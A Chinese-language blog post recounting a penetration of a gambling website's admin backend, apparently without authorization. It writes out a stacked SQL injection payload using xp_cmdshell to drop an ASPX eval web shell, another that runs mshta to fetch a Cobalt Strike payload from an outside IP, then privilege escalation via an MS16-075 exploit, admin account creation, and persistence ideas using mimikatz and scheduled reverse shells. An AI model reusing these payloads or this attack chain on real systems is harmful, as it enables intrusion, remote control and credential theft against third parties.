记录某博彩网站渗透

最初，我得到的只有一个后台网址，深深吸了口烟，可攻击点太少了。 如果没有弱口令，注入，和直接rce的点，是很难打开缺口的 所以首先第一步要做的事情进行信息搜集了！ 渗透的本质是信息收集的 在网络空间安全搜索引擎fofa上查询一下，再就是端口扫描 ，直接略过，懂的都懂。 有利用价值的端口：80,81,1433,3389 脆弱点：http://49.xxx.xx.xxx:81/Login/index 但是通过一段常规操作操作后，发现后台登录界面存在堆叠注入！ 且获得如下信息： SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5) 权限：SA

刚开始得到注入就想着进入后台看看，但是没有回显，就肝了一段时间的py脚本。

得到密码进入后台，模板千篇一律，无数据备份，无修改模板，上传个人判断基于白名单，有编辑器不过示例代码已删除，留言板不可留言，回过头来又看注入，既然是堆叠注入，那就可以执行SQL语句，然后一顿操作，嗯嗯嗯… 没有回显，代码如下：

以为到这里就结束了，没想到 3389端口登录失败，1433端口连接失败！这里我很懵，经过大佬的一番指导，可以把注入信息通过外带DNSLlog，或者直接使用xp_cmdshell执行命令，但是不知道是否开启，所有尝试了一下ping以下dnslog,还好前几天补过：

既然dnslog有回显，那就证明xp_cmdshel扩展开启，可以执行命令，这里两种思路: 第一种是cmd执行命令，输出到网站根目录

';exec master…xp_cmdshell ‘echo ^<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%^> > c:\网站路径\shell.aspx’;–

由于我爆不出来绝对路径就采用了第二种方法 第二种是下载木马，运行木马直接上线 cs设置好监听器，生成一个html application文件，然后上传到cs服务器上 在注入点执行

'; exec master.dbo.xp_cmdshell ‘mshta http://39.xx.xxx.xxx:80/download/file.ext’; –

过一会儿有台主机上线了

补丁安装200多，较多，把systeminfo中的信息漏洞对比，看有没有漏补的，发现可利用漏洞ms16-075 systeminfo | findstr KB3164038 https://github.com/vysecurity/reflectivepotato.git github上该exp的cna插件，加载到脚本管理器中

我这里直接创建管理员，但是更隐蔽的方法是通过mimikatz读取hash或者SSP获取明文密码，来获取持久控制，或者利用计划任务，过一段时间反弹shell回来！

渗透本就是逆天而行！